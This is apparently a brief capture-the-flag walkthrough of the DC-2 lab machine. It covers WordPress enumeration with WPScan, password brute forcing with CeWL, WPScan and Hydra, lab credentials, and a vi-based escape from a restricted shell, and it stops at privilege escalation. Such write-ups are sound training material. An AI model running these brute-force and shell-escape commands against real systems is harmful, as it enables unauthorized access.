NETWORK

ENUMERATION

We are facing a wordress instance

WP SCAN

wpscan --url http://dc-2 --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token XXXX  -f cli-no-color --disable-tls-checks

Brute force attack

Looking into the pages of the website we have found

Let’s first create a wordlist with Cewl

cewl http://dc-2 > dc2_wordlist.txt

We have found some working credentials

wpscan --url http://dc-2 --disable-tls-checks -U users.txt -P dc2_wordlist.txt

Admin access as Jerry

Using JErry credentials found in the previous step, we have access to the admin area

jerry / adipiscing                                                                      
tom / parturient 

We have discovered another flag

FOOTHOLD

SSH brute force

Running Hydra we are able to confirm tom access

hydra -e nsr -L users.txt -P users.txt -vV dc-2 ssh

SSH as Tom

Escape Rbash

We can see the flag3 in tom folder

Tom ssh is a limited rbash session

Using vi like explain here https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

vi 
:set shell=/bin/sh

then typing the following

:shell

we are able to see Jerry files

PRIV ESCALATION

bash as Jerry

In gtfobin, we have found a solution